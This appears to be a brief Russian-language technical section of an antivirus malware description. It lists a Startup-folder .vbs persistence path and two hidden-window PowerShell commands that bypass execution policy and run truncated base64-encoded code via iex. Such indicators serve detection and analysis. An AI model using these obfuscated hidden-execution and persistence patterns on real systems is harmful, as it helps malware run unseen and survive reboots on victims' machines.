Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -windowstyle hidden iex(([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('W1N5c3RlW1N5c3RlbS5UaHJlYWRpbmcuVGhyZWFkXTo6U2xlZXAoMTAwMCkgDQpBZGQtVHlwZSAtVHlwZUR...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -windowstyle hidden iex(([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('W1N5c3RlW1N5c3RlbS5UaHJlYWRpbmcuVGhyZWFkXTo6U2xlZXAoMTAwMCkgDQpBZGQtVHlwZSAtVHlwZUR...